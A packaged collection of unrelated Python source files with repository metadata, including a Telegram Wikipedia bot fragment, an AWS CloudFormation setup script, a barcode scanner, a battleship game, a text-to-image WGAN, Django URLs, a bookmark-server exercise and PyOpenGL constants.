button = types.InlineKeyboardButton(i, callback_data="d_wiki_s_{0}".format(arr[0].index(i)))
except:
continue
steps += 1
markup3.add(button)
state = dp.current_state(chat=call.from_user.id, user=call.from_user.id)
await state.update_data(wikipediaSearches=wikipediaSearches)
_button = types.InlineKeyboardButton("Закрыть", callback_data=CLOSE_INLINE_MESSAGE)
markup3.add(_button)
return [text, markup3]
@dp.callback_query_handler(lambda c: c.data.startswith("d_wiki_s_"))
async def choose_article(call: types.CallbackQuery, state: FSMContext):
try:
data = await state.get_data()
text = "null"
text = data.get("wikipediaSearches")
markup3 = types.InlineKeyboardMarkup()
if(text != "null"):
[text, markup3] = await botWikipediaArticle(call, state, text)
else:
text = "Error!"
# print(text)
await bot.send_message(call.from_user.id, text, reply_markup=markup3)
await state.finish()
except Exception as ex:
print(ex)
await bot.send_message(call.from_user.id, f"Технические неполадки, приносим свои извинения.")
for admin in ADMINS:
await bot.send_message(admin, f"У пользователя {call.from_user.full_name} произошла ошибка при поиске!")
await bot.delete_message(call.message.chat.id, call.message.message_id)
async def botWikipediaArticle(call: types.CallbackQuery, state: FSMContext, wikiSearch):
text = call.data.replace("d_wiki_s_", "")
ourSearch = wikiSearch[int(text)]
userId = call.from_user.id
_button = types.InlineKeyboardButton("Закрыть", callback_data=CLOSE_INLINE_MESSAGE)
markup3 = types.InlineKeyboardMarkup()
if ourSearch == None or ourSearch == "":
markup3.add(_button)
return ["Возникла техническая ошибка. Приносим свои извинения.", markup3]
article = "{0}\n\n".format(ourSearch)
tempArticle = wikipediaSearch.article("ru", ourSearch)
if tempArticle == None or tempArticle == "":
markup3.add(_button)
return ["Возникла техническая ошибка. Приносим свои извинения.", markup3]
article += tempArticle
link = wikipediaSearch.link("ru", ourSearch)
if link != "" and link != None:
button = types.InlineKeyboardButton("Ссылка", url=link)
markup3.add(button)
markup3.add(_button)
return [article, markup3] | [
"dobbikov@gmail.com"
] | dobbikov@gmail.com |
e6f3da7777d83a01afc7ca1cc7eb9a283bd37e3f | 6c60a70bbf6b81045a71dd77b700f1498d7f596e | /build_from_scratch.py | 3a00bfb8c45bf26a6575823561dc17dec886c024 | [] | no_license | madcore-ai/cloudformation | b0a5e1af16e660d82ed4fb15fcc04825ac39fd55 | e111bb043661d04b5568240861e9802dac4914f5 | refs/heads/master | 2020-12-24T09:37:27.956300 | 2017-03-24T20:49:32 | 2017-03-24T20:49:32 | 73,280,393 | 0 | 0 | null | 2017-06-02T11:56:35 | 2016-11-09T12:00:55 | Python | UTF-8 | Python | false | false | 3,281 | py | """
Script to create madcore cluster from scratch
"""
import subprocess
import json
import os
from collections import OrderedDict
INSTANCE_TYPE = 'm3.medium'
SPOT_PRICE = '0.02'
SUBDOMAIN = 'chirgeo'
def run_cmd(cmd, to_json=True):
print("RUN CMD: %s..." % cmd)
cwd = os.path.dirname(os.path.abspath(__file__))
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, cwd=cwd, shell=True)
out, err = process.communicate()
try:
if to_json:
o = json.loads(out)
if 'describe' in cmd:
o = output_to_dict(o)
return o
except:
print("Continue")
def output_to_dict(output):
d = {}
for item in output['Stacks'][0]['Outputs']:
d[item['OutputKey']] = item['OutputValue']
output['Stacks'][0]['Outputs'] = d
return output
def wait_until_stack_completed(stack_name):
run_cmd('aws cloudformation wait stack-create-complete --stack-name MADCORE-%s' % stack_name, to_json=False)
def change_params(stack_type, replacer):
with open('%s-parameters.json' % stack_type, 'r') as f:
data = json.load(f, object_pairs_hook=OrderedDict)
for item in data:
if item['ParameterKey'] in replacer:
if item['ParameterValue'] != replacer[item['ParameterKey']]:
item['ParameterValue'] = replacer[item['ParameterKey']]
with open('%s-parameters.json' % stack_type, 'w') as f:
f.write(json.dumps(data, indent=2, sort_keys=False) + '\n')
if __name__ == '__main__':
run_cmd('./network-create.sh')
wait_until_stack_completed("Net")
net_output = run_cmd('./network-describe.sh')['Stacks'][0]['Outputs']
print(net_output)
run_cmd('./s3-create.sh')
wait_until_stack_completed("S3")
s3_output = run_cmd('./s3-describe.sh')['Stacks'][0]['Outputs']
print(s3_output)
change_params('sgfm', {'VpcId': net_output['VpcId']})
run_cmd('./sgfm-create.sh')
wait_until_stack_completed("FollowMe")
sgfm_output = run_cmd('./sgfm-describe.sh')['Stacks'][0]['Outputs']
print(sgfm_output)
change_params('core', {'FollowmeSecurityGroup': sgfm_output['FollowmeSgId'],
'PublicNetZoneA': net_output['PublicNetZoneA'], 'S3BucketName': s3_output['S3BucketName'],
'InstanceType': INSTANCE_TYPE})
run_cmd('./core-create.sh')
wait_until_stack_completed("Core")
core_output = run_cmd('./core-describe.sh')['Stacks'][0]['Outputs']
print(core_output)
change_params('cluster', {'VpcId': net_output['VpcId'], 'MasterIP': core_output['MadCorePrivateIp'],
'PublicNetZoneA': net_output['PublicNetZoneA'], 'S3BucketName': s3_output['S3BucketName'],
'InstanceType': INSTANCE_TYPE, 'SpotPrice': SPOT_PRICE})
run_cmd('./cluster-create.sh')
wait_until_stack_completed("Cluster")
cluster_output = run_cmd('./cluster-describe.sh')['Stacks'][0]['Outputs']
print(cluster_output)
change_params('dns', {'SubDomainName': SUBDOMAIN, 'EC2PublicIP': core_output['MadCorePublicIp']})
run_cmd('./dns-create.sh')
wait_until_stack_completed("Dns")
dns_output = run_cmd('./dns-describe.sh')['Stacks'][0]['Outputs']
print(dns_output)
| [
"chiricagheorghe@gmail.com"
] | chiricagheorghe@gmail.com |
bc6c12b391007c882524d48ee3fa5f2f0d388438 | c899db9dfaf33ac06418ba3431f9aa22b5ae9b85 | /UserInterface/barcode.py | 5a6d35f5b4bbe713fd52e33833da5cbbd7ba06ab | [] | no_license | luben3485/Robot_Smart_Shopping_Cart | 13f4c2882b973840f9fefa9dacb1a51d48ca26e6 | 2028cfa45e34930afa73e83836feae7b2421b48b | refs/heads/master | 2023-07-14T11:26:05.713973 | 2023-07-03T20:43:54 | 2023-07-03T20:43:54 | 156,553,235 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,548 | py | # USAGE
# python barcode_scanner_video.py
# import the necessary packages
from imutils.video import VideoStream
from pyzbar import pyzbar
import argparse
import datetime
import imutils
import time
import cv2
def barcode():
global barcodeData
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-o", "--output", type=str, default="barcodes.csv",
help="path to output CSV file containing barcodes")
args = vars(ap.parse_args())
# initialize the video stream and allow the camera sensor to warm up
print("[INFO] starting video stream...")
# vs = VideoStream(src=0).start()
vs = VideoStream(usePiCamera=True).start()
time.sleep(2.0)
# open the output CSV file for writing and initialize the set of
# barcodes found thus far
csv = open(args["output"], "w")
found = set()
# loop over the frames from the video stream
while True:
# grab the frame from the threaded video stream and resize it to
# have a maximum width of 400 pixels
frame = vs.read()
frame = imutils.resize(frame, width=400)
# find the barcodes in the frame and decode each of the barcodes
barcodes = pyzbar.decode(frame)
# loop over the detected barcodes
for barcode in barcodes:
# extract the bounding box location of the barcode and draw
# the bounding box surrounding the barcode on the image
(x, y, w, h) = barcode.rect
#cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)
# the barcode data is a bytes object so if we want to draw it
# on our output image we need to convert it to a string first
barcodeData = barcode.data.decode("utf-8")
barcodeType = barcode.type
# draw the barcode data and barcode type on the image
text = "{} ({})".format(barcodeData, barcodeType)
# cv2.putText(frame, text, (x, y - 10),
# cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)
#
# if the barcode text is currently not in our CSV file, write
# the timestamp + barcode to disk and update the set
# if barcodeData not in found:
# csv.write("{},{}\n".format(datetime.datetime.now(),
# barcodeData))
# csv.flush()
# found.add(barcodeData)
if barcodes:
vs.stop()
csv.close()
cv2.destroyAllWindows()
break
# show the output frame
cv2.imshow("Barcode Scanner", frame)
key = cv2.waitKey(1) & 0xFF
#if the `q` key was pressed, break from the loop
#if key == ord("q"):
# break
# close the output CSV file do a bit of cleanup
#print("[INFO] cleaning up...")
return barcodeData
if __name__== '__main__':
barcode()
| [
"luben3485@gmail.com"
] | luben3485@gmail.com |
c10d62fd2bf5afad938041b5b59a3a981f86020d | 9e0c4fc9995c556e0075c5a4e658977aca3a10f1 | /Opgave_8 week 2.py | 1f6c485ccbfea5028c1a5ac87142f364dac2e77f | [] | no_license | dylandale97/python | 301cdb557ae904b48d826ca24f80560723b451ca | 01436858482c601c875ce34e7e75420e9b182df8 | refs/heads/master | 2020-07-31T09:39:41.190019 | 2019-10-17T13:43:42 | 2019-10-17T13:43:42 | 210,563,463 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,911 | py | from random import randint
BOARD_SIZE = 4
NR_GUESSES = 4
# initializing board
board = []
for x in range(BOARD_SIZE):
board.append(["O"] * BOARD_SIZE)
def print_board(board):
for row in board:
print (" ".join(row))
# start the game and printing the board
print("Let's play Battleship!")
print_board(board)
# define where the ship is
ship_row = randint(0, BOARD_SIZE-1)
ship_col = randint(0, BOARD_SIZE-1)
guessL = []
won = 0
validation = True
while NR_GUESSES > 0:
tempL = [0,0]
print('Make a guess: ')
print('Wich row?: ')
guessrow = int(input())
print('Wich place?: ')
guessplace = int(input())
if guessplace <= 0 or guessrow <= 0 or guessplace > 4 or guessrow > 4:
validation = False
print('Pick a value between 0 and 4')
print('Wich row?: ')
guessrow = int(input())
print('Wich place?: ')
guessplace = int(input())
for x in guessL:
while x[0] == guessrow and x[1] == guessplace:
print('This value is already chosen')
print('Wich row?: ')
guessrow = int(input())
print('Wich place?: ')
guessplace = int(input())
# while x[0] == guessrow and x[1] == guessplace or guessplace <= 0 or guessrow <= 0 or guessplace > 4 or guessrow > 4:
# validation = False
# if x[0] == guessrow and x[1] == guessplace:
# print('This value is already chosen')
# print('Wich row?: ')
# guessrow = int(input())
# print('Wich place?: ')
# guessplace = int(input())
# if guessplace<=0 or guessrow<=0 or guessplace>4 or guessrow>4:
# print('Pick a value between 0 and 4')
# print('Wich row?: ')
# guessrow = int(input())
# print('Wich place?: ')
# guessplace = int(input())
# while x[0] == guessrow and x[1] == guessplace:
# print('This value is already chosen')
# print('Wich row?: ')
# guessrow = int(input())
# print('Wich place?: ')
# guessplace = int(input())
# while guessplace<=0 or guessrow<=0 or guessplace>4 or guessrow>4:
# print('Pick a value between 0 and 4')
# print('Wich row?: ')
# guessrow = int(input())
# print('Wich place?: ')
# guessplace = int(input())
tempL[0] = guessrow
tempL[1] = guessplace
if guessrow == ship_row and guessplace == ship_col:
print('You won!')
won = 1
break
for x in range(BOARD_SIZE):
if x+1 == guessrow:
temp = board[guessrow-1]
temp[guessplace-1] = 'x'
print_board(board)
guessL.append(tempL)
NR_GUESSES = NR_GUESSES - 1
if won == 0:
print("Game Over")
| [
"loranvanwingerden@gmail.com"
] | loranvanwingerden@gmail.com |
a5e62068f9d865390a9f89672b455a13c530a395 | 3c682d2db0c4f85f70dee95d88f8205fed5bbf95 | /2-2generator.py | 70ff1f11b253b389e87179a4cd5b9306f397d026 | [] | no_license | john81923/VAE-DCGAN | 9d99afc59daa4dd4c2191e01eff632019a053cf9 | 5a0455a023b7359299200f4b4f1d7dc7e775db8f | refs/heads/master | 2020-09-16T10:48:22.079402 | 2019-11-24T13:18:47 | 2019-11-24T13:18:47 | 223,746,855 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,669 | py | import numpy as np
import tensorflow as tf
from skip_thoughts import skipthoughts
import scipy.misc
import skimage
import skimage.io
import skimage.transform
import matplotlib.pyplot as plt
from ops import *
import data_reader
from data_reader import realimg
import os
import sys
import re
import cPickle as pk
def conv_out_size_same(size, stride):
return int(math.ceil(float(size) / float(stride)))
class WGAN(object):
def __init__(self, sess, img_h, img_w, img_c, op):
#---input setting---#
self.sess = sess
self.op = op
self.output_height, self.output_width = img_h, img_w
self.c_dim = img_c
self.orig_embed_size = 4800
#---training data---#
if op == "train":
self.batch_size = 64
print "loading training data......"
with open("./train_data/img_objs_new.pk", "r") as f:
img_objs = pk.load(f)
batch = data_reader.get_train_batch(img_objs, self.batch_size)
self.rimg_batch = batch[0]
self.wimg_batch = batch[1]
self.match_embed_batch = batch[2]
self.mismatch_embed_batch = batch[3]
#---testing data---#
if op == "test":
self.batch_size = 1
self.test_sent = tf.placeholder(tf.float32, shape=
[1, self.orig_embed_size])
#---model network setting---#
self.gf_dim = 64
self.df_dim = 64
self.z_dim = 100
self.embed_size = 128
self.keep_prob = tf.placeholder(tf.float32)
#---batch_norm of discriminator---#
self.d_bn0 = batch_norm(name="d_bn0")
self.d_bn1 = batch_norm(name="d_bn1")
self.d_bn2 = batch_norm(name="d_bn2")
self.d_bn3 = batch_norm(name="d_bn3")
self.d_bn4 = batch_norm(name="d_bn4")
#---batch_norm of generator---#
self.g_bn0 = batch_norm(name="g_bn0")
self.g_bn1 = batch_norm(name="g_bn1")
self.g_bn2 = batch_norm(name="g_bn2")
self.g_bn3 = batch_norm(name="g_bn3")
#---build model---#
print "building model......"
self.build_model()
def build_model(self):
#---Prepare data tensor---#
# Draw sample from random noise
self.z = tf.placeholder(tf.float32, [None, self.z_dim], name='z')
# Encode testing captions
if self.op == "test":
self.test_embed = self.sent_dim_reducer(self.test_sent, name='g_sent_reduce')
self.sample_in = tf.concat([self.z, self.test_embed], 1)
self.sample = self.sampler(self.sample_in)
self.saver = tf.train.Saver()
return
# Encode matching captions
self.g_h = self.sent_dim_reducer(self.match_embed_batch, name='g_sent_reduce')
self.d_h = self.sent_dim_reducer(self.match_embed_batch, name='d_sent_reduce')
# Encode mis-matching captions
self.d_h_ = self.sent_dim_reducer(self.mismatch_embed_batch, name='d_sent_reduce', reuse=True)
# flip image horizontally
self.rimg_batch_flip = []
for i in range(self.rimg_batch.shape[0]):
self.rimg_batch_flip.append(
tf.image.random_flip_left_right(self.rimg_batch[i]))
self.rimg_batch_flip = tf.convert_to_tensor(self.rimg_batch_flip)
#---Forward through generator---#
self.G_in = tf.concat([self.z, self.g_h], 1)
self.fimg_batch = self.generator(self.G_in)
#---Forward through discriminator---#
# real image, right text
self.ri, self.ri_logits = self.discriminator(
self.d_h, self.rimg_batch_flip, reuse=False)
ri, ri_logits = self.ri, self.ri_logits
# fake image, right text
self.fi, self.fi_logits = self.discriminator(
self.d_h, self.fimg_batch, reuse=True)
fi, fi_logits = self.fi, self.fi_logits
# real image, wrong text
self.wt, self.wt_logits = self.discriminator(
self.d_h_, self.rimg_batch_flip, reuse=True)
wt, wt_logits = self.wt, self.wt_logits
# wrong image, right text
self.wi, self.wi_logits = self.discriminator(
self.d_h, self.wimg_batch, reuse=True)
wi, wi_logits = self.wi, self.wi_logits
#---define loss tensor---#
# loss of generator
self.g_loss = tf.reduce_mean(-fi_logits)
# loss of discriminator
self.d_loss = (
tf.reduce_mean(ri_logits) -
tf.reduce_mean(fi_logits) -
tf.reduce_mean(wt_logits) -
tf.reduce_mean(wi_logits)
)
#---seperate the variables of discriminator and generator by name---#
t_vars = tf.trainable_variables()
self.d_vars = [var for var in t_vars if 'd_' in var.name]
self.g_vars = [var for var in t_vars if 'g_' in var.name]
self.saver = tf.train.Saver()
#---weight clipping---#
self.d_clip = [p.assign(tf.clip_by_value(p, -0.01, 0.01)) for p in self.d_vars]
#---training op---#
learning_rate_d = 0.00005
learning_rate_g = 0.00005
self.d_optim = tf.train.RMSPropOptimizer(learning_rate_d).minimize(
-self.d_loss, var_list=self.d_vars)
self.g_optim = tf.train.RMSPropOptimizer(learning_rate_g).minimize(
self.g_loss, var_list=self.g_vars)
def train(self):
# session
sess = self.sess
# initial all variable
sess.run(tf.global_variables_initializer())
tf.train.start_queue_runners(sess)
for epoch in range(100000):
# sample noise
batch_z = np.random.uniform(
-1, 1, [self.batch_size, self.z_dim]).astype(np.float32)
print "--------------------------------"
print "epoch {}".format(epoch)
# update discriminator parameters
for _ in range(5):
fetches = {
"d_loss": self.d_loss,
"d_optim": self.d_optim,
"d_clip": self.d_clip,
}
feed_dict = {
self.z: batch_z,
self.keep_prob: 1.0,
}
vals = sess.run(fetches, feed_dict=feed_dict)
d_loss = vals["d_loss"]
print "d_loss {}".format(d_loss)
# update generator parameters
for _ in range(1):
fetches = {
"real_imgs": self.rimg_batch_flip,
"sample_imgs": self.fimg_batch,
"g_loss": self.g_loss,
"g_optim": self.g_optim,
}
feed_dict = {
self.z: batch_z,
self.keep_prob: 1.0,
}
vals = sess.run(fetches, feed_dict=feed_dict)
g_loss = vals["g_loss"]
sample_imgs = vals["sample_imgs"]
print "g_loss {}".format(g_loss)
# save and test the model
if (epoch+1) % 100 == 0:
self.save('./wgan_new/', epoch)
# for idx, img in enumerate(sample_imgs):
# skimage.io.imsave("./sample/{}.jpg".format(idx), img)
def test(self):
# load model
model_name = 'wgan_new'
test_dir = './samples/'
if not os.path.exists(test_dir):
os.makedirs(test_dir)
self.load("./{}/".format(model_name))
sess = self.sess
test_sent = data_reader.get_test_sent(sys.argv[1])
for idx, sent in enumerate(test_sent):
sent = np.reshape(sent, (1, -1))
for i in range(5):
z = np.random.uniform(-1, 1, [1, self.z_dim]).astype(np.float32)
fetches = {
"sample_in": self.sample_in,
"sample_img": self.sample
}
feed_dict = {
self.test_sent: sent,
self.z: z,
}
vals = sess.run(fetches, feed_dict=feed_dict)
# write out the generated image
sample_img = vals["sample_img"]
skimage.io.imsave("{}/sample_{}_{}.jpg".format(
test_dir, idx+1, i+1), sample_img)
def sent_dim_reducer(self, sent, name, reuse=False):
with tf.variable_scope("sent_dim_reducer") as scope:
if reuse:
scope.reuse_variables()
w = tf.get_variable(
"{}_w".format(name), [self.orig_embed_size, self.embed_size],
tf.float32, tf.random_normal_initializer(stddev=0.01))
b = tf.get_variable(
"{}_b".format(name), [self.embed_size],
tf.float32, initializer=tf.constant_initializer(0.0))
embed = tf.matmul(sent, w) + b
return embed
def discriminator(self, sent, image, reuse=False):
with tf.variable_scope("discriminator") as scope:
print "Discriminator"
if reuse:
scope.reuse_variables()
print image.shape
h0 = lrelu(conv2d(image, self.df_dim, name='d_h0_conv'))
print h0.shape
h1 = lrelu(self.d_bn1(conv2d(h0, self.df_dim*2, name='d_h1_conv')))
print h1.shape
h2 = lrelu(self.d_bn2(conv2d(h1, self.df_dim*4, name='d_h2_conv')))
print h2.shape
h3 = lrelu(self.d_bn3(conv2d(h2, self.df_dim*8, name='d_h3_conv')))
print h3.shape
sent_repicate = sent
for i in range(int(h3.shape[1])**2 - 1):
sent_repicate = tf.concat([sent_repicate, sent], 1)
sent_repicate = tf.reshape(
sent_repicate,
[self.batch_size, int(h3.shape[1]), int(h3.shape[1]), -1])
h3 = tf.concat([h3, sent_repicate], 3)
print h3.shape
h4 = lrelu(self.d_bn4(conv2d(
h3, self.df_dim*8, 1, 1, 1, 1, name = "d_h4_conv")))
print h4.shape
h5 = linear(tf.reshape(h4, [self.batch_size, -1]), 1, 'd_h4_lin')
print h5.shape
return tf.nn.sigmoid(h5), h5
def generator(self, z, reuse=False):
print "Generator"
with tf.variable_scope("generator") as scope:
if reuse:
scope.reuse_variables()
s_h, s_w = self.output_height, self.output_width
s_h2, s_w2 = conv_out_size_same(s_h, 2), conv_out_size_same(s_w, 2)
s_h4, s_w4 = conv_out_size_same(s_h2, 2), conv_out_size_same(s_w2, 2)
s_h8, s_w8 = conv_out_size_same(s_h4, 2), conv_out_size_same(s_w4, 2)
s_h16, s_w16 = conv_out_size_same(s_h8, 2), conv_out_size_same(s_w8, 2)
# project `z` and reshape
self.z_, self.h0_w, self.h0_b = linear(
z, (s_h16*s_w16*self.gf_dim*8), 'g_h0_lin', with_w=True)
self.h0 = tf.reshape(
self.z_, [-1, s_h16, s_w16, self.gf_dim*8])
h0 = tf.nn.relu(self.g_bn0(self.h0))
print h0.shape
self.h1, self.h1_w, self.h1_b = deconv2d(
h0, [self.batch_size, s_h8, s_w8, self.gf_dim*4],
name='g_h1', with_w=True)
h1 = tf.nn.dropout(tf.nn.relu(self.g_bn1(self.h1)), self.keep_prob)
print h1.shape
self.h2, self.h2_w, self.h2_b = deconv2d(
h1, [self.batch_size, s_h4, s_w4, self.gf_dim*2],
name='g_h2', with_w=True)
h2 = tf.nn.dropout(tf.nn.relu(self.g_bn2(self.h2)), self.keep_prob)
print h2.shape
self.h3, self.h3_w, self.h3_b = deconv2d(
h2, [self.batch_size, s_h2, s_w2, self.gf_dim*1],
name='g_h3', with_w=True)
h3 = tf.nn.dropout(tf.nn.relu(self.g_bn3(self.h3)), self.keep_prob)
print h3.shape
self.h4, self.h4_w, self.h4_b = deconv2d(
h3, [self.batch_size, s_h, s_w, self.c_dim],
name='g_h4', with_w=True)
print self.h4.shape
return tf.nn.tanh(self.h4)
def sampler(self, z):
with tf.variable_scope("generator") as scope:
# scope.reuse_variables()
s_h, s_w = self.output_height, self.output_width
s_h2, s_w2 = conv_out_size_same(s_h, 2), conv_out_size_same(s_w, 2)
s_h4, s_w4 = conv_out_size_same(s_h2, 2), conv_out_size_same(s_w2, 2)
s_h8, s_w8 = conv_out_size_same(s_h4, 2), conv_out_size_same(s_w4, 2)
s_h16, s_w16 = conv_out_size_same(s_h8, 2), conv_out_size_same(s_w8, 2)
# project `z` and reshape
self.z_, self.h0_w, self.h0_b = linear(
z, (s_h16*s_w16*self.gf_dim*8), 'g_h0_lin', with_w=True)
self.h0 = tf.reshape(
self.z_, [-1, s_h16, s_w16, self.gf_dim*8])
h0 = tf.nn.relu(self.g_bn0(self.h0, train=False))
self.h1 = deconv2d(
h0, [self.batch_size, s_h8, s_w8, self.gf_dim*4], name='g_h1')
h1 = tf.nn.relu(self.g_bn1(self.h1, train=False))
self.h2 = deconv2d(
h1, [self.batch_size, s_h4, s_w4, self.gf_dim*2], name='g_h2')
h2 = tf.nn.relu(self.g_bn2(self.h2, train=False))
self.h3 = deconv2d(
h2, [self.batch_size, s_h2, s_w2, self.gf_dim*1], name='g_h3')
h3 = tf.nn.relu(self.g_bn3(self.h3, train=False))
self.h4 = deconv2d(
h3, [self.batch_size, s_h, s_w, self.c_dim], name='g_h4')
return tf.nn.tanh(self.h4)
def save(self, checkpoint_dir, step):
model_name = "basic_all.model"
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
self.saver.save(
self.sess, os.path.join(checkpoint_dir, model_name),
global_step=step)
def load(self, checkpoint_dir):
print(" [*] Reading checkpoints...")
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
counter = int(next(re.finditer("(\d+)(?!.*\d)",ckpt_name)).group(0))
print(" [*] Success to read {}".format(ckpt_name))
return True, counter
else:
print(" [*] Failed to find a checkpoint")
return False, 0
sess = tf.Session()
test_model = WGAN(sess, 64, 64, 3, "test")
test_model.test()
| [
"johnny@Johnnyde-MacBook-Pro.local"
] | johnny@Johnnyde-MacBook-Pro.local |
7eae7b743e1fdb51757eab7546ee206614610ba1 | 43b4cabe8b711d9eb6988a17d0914cf95ac1c5a1 | /Lesson-2/7_BookmarkServer/BookmarkServer.py | b42fd8ceecfd9c42216f26e2953ac331e00dca63 | [] | no_license | fatih-iver/course-ud303 | c9aae321336c8e0b3ed1e671338cc993d04dc34b | 64d2107891cc24d303dffb98216a72505eeeb217 | refs/heads/master | 2020-03-24T21:57:30.923020 | 2018-08-04T11:50:20 | 2018-08-04T11:50:20 | 143,059,407 | 0 | 0 | null | 2018-07-31T19:40:50 | 2018-07-31T19:40:49 | null | UTF-8 | Python | false | false | 5,827 | py | #!/usr/bin/env python3
#
# A *bookmark server* or URI shortener that maintains a mapping (dictionary)
# between short names and long URIs, checking that each new URI added to the
# mapping actually works (i.e. returns a 200 OK).
#
# This server is intended to serve three kinds of requests:
#
# * A GET request to the / (root) path. The server returns a form allowing
# the user to submit a new name/URI pairing. The form also includes a
# listing of all the known pairings.
# * A POST request containing "longuri" and "shortname" fields. The server
# checks that the URI is valid (by requesting it), and if so, stores the
# mapping from shortname to longuri in its dictionary. The server then
# redirects back to the root path.
# * A GET request whose path contains a short name. The server looks up
# that short name in its dictionary and redirects to the corresponding
# long URI.
#
# Your job in this exercise is to finish the server code.
#
# Here are the steps you need to complete:
#
# 1. Write the CheckURI function, which takes a URI and returns True if a
# request to that URI returns a 200 OK, and False otherwise.
#
# 2. Write the code inside do_GET that sends a 303 redirect to a known name.
#
# 3. Write the code inside do_POST that sends a 400 error if the form fields
# are missing.
#
# 4. Write the code inside do_POST that sends a 303 redirect to the form
# after saving a newly submitted URI.
#
# 5. Write the code inside do_POST that sends a 404 error if a URI is not
# successfully checked (i.e. if CheckURI returns false).
#
# In each step, you'll need to delete a line of code that raises the
# NotImplementedError exception. These are there as placeholders in the
# starter code.
#
# After writing each step, restart the server and run test.py to test it.
import http.server
import requests
from urllib.parse import unquote, parse_qs
memory = {}
form = '''<!DOCTYPE html>
<title>Bookmark Server</title>
<form method="POST">
<label>Long URI:
<input name="longuri">
</label>
<br>
<label>Short name:
<input name="shortname">
</label>
<br>
<button type="submit">Save it!</button>
</form>
<p>URIs I know about:
<pre>
{}
</pre>
'''
def CheckURI(uri, timeout=5):
'''Check whether this URI is reachable, i.e. does it return a 200 OK?
This function returns True if a GET request to uri returns a 200 OK, and
False if that GET request returns any other response, or doesn't return
(i.e. times out).
'''
try:
r = requests.get(uri, timeout=timeout)
# If the GET request returns, was it a 200 OK?
return r.status_code == 200
except requests.RequestException:
# If the GET request raised an exception, it's not OK.
return False
class Shortener(http.server.BaseHTTPRequestHandler):
def do_GET(self):
# A GET request will either be for / (the root path) or for /some-name.
# Strip off the / and we have either empty string or a name.
name = unquote(self.path[1:])
if name:
if name in memory:
# 2. Send a 303 redirect to the long URI in memory[name].
self.send_response(303)
longuri = memory[name]
self.send_header('Location', longuri)
self.end_headers()
else:
# We don't know that name! Send a 404 error.
self.send_response(404)
self.send_header('Content-type', 'text/plain; charset=utf-8')
self.end_headers()
self.wfile.write("I don't know '{}'.".format(name).encode())
else:
# Root path. Send the form.
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
# List the known associations in the form.
known = "\n".join("{} : {}".format(key, memory[key])
for key in sorted(memory.keys()))
self.wfile.write(form.format(known).encode())
def do_POST(self):
# Decode the form data.
length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(length).decode()
params = parse_qs(body)
# Check that the user submitted the form fields.
if "longuri" not in params or "shortname" not in params:
# 3. Serve a 400 error with a useful message.
self.send_response(400)
self.send_header('Content-type', 'text/plain; charset=utf-8')
self.end_headers()
self.wfile.write("Missing form fields!".encode())
return
longuri = params["longuri"][0]
shortname = params["shortname"][0]
if CheckURI(longuri):
# This URI is good! Remember it under the specified name.
memory[shortname] = longuri
# 4. Serve a redirect to the root page (the form).
self.send_response(303)
self.send_header('Location', '/')
self.end_headers()
else:
# Didn't successfully fetch the long URI.
# 5. Send a 404 error with a useful message.
self.send_response(404)
self.send_header('Content-type', 'text/plain; charset=utf-8')
self.end_headers()
self.wfile.write("Couldn't fetch URI '{}'. Sorry!".format(longuri).encode())
if __name__ == '__main__':
port = int(os.environ.get('PORT', 8000)) # Use PORT if it's there.
server_address = ('', port)
httpd = http.server.HTTPServer(server_address, Shortener)
httpd.serve_forever()
| [
"noreply@github.com"
] | fatih-iver.noreply@github.com |
0819047a96b945379572f7777ee4e6e16873fa80 | 3113f2ee8ff62b41a967e4381386f9379a0721d2 | /beers/urls.py | 22991583e9aea02b5605705db5f7fcc9678da06f | [] | no_license | Utkarsh1308/Beer-Diary | c804a96ba0d4d5d0b3a8a676e9e6b024e5ad81b3 | 0075f7aaddf05d061f113cce612cd2318d2b91f2 | refs/heads/master | 2022-06-13T16:54:59.766439 | 2020-05-05T03:11:40 | 2020-05-05T03:11:40 | 257,497,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 679 | py | from django.urls import path
from . import views
app_name = "beers"
urlpatterns = [
path('', views.index, name='index'),
path('beer', views.detail, name='detail'),
path('beer/<slug:author>/<slug:beer>', views.beer, name='beer'),
path('add/beer', views.AddBeer.as_view(), name='add_beer'),
path('<slug:pk>/update', views.UpdateBeer.as_view(), name='update_beer'),
path('<slug:pk>/delete', views.DeleteBeer.as_view(), name='delete_beer'),
path('register', views.register, name='register'),
path('login', views.login_user, name='login_user'),
path('logout', views.logout_user, name='logout_user'),
path('posts', views.BeerList.as_view())
]
| [
"f20160600@goa.bits-pilani.ac.in"
] | f20160600@goa.bits-pilani.ac.in |
759f2892a4b03efd81ece2f4d33a6eba2ba16139 | 5e84763c16bd6e6ef06cf7a129bb4bd29dd61ec5 | /blimgui/dist/OpenGL/raw/GLX/MESA/query_renderer.py | 072891b41d9ef525470951c92ec96a668f34048f | [
"MIT"
] | permissive | juso40/bl2sdk_Mods | 8422a37ca9c2c2bbf231a2399cbcb84379b7e848 | 29f79c41cfb49ea5b1dd1bec559795727e868558 | refs/heads/master | 2023-08-15T02:28:38.142874 | 2023-07-22T21:48:01 | 2023-07-22T21:48:01 | 188,486,371 | 42 | 110 | MIT | 2022-11-20T09:47:56 | 2019-05-24T20:55:10 | Python | UTF-8 | Python | false | false | 2,034 | py | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLX import _types as _cs
# End users want this...
from OpenGL.raw.GLX._types import *
from OpenGL.raw.GLX import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLX_MESA_query_renderer'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GLX,'GLX_MESA_query_renderer',error_checker=_errors._error_checker)
GLX_RENDERER_ACCELERATED_MESA=_C('GLX_RENDERER_ACCELERATED_MESA',0x8186)
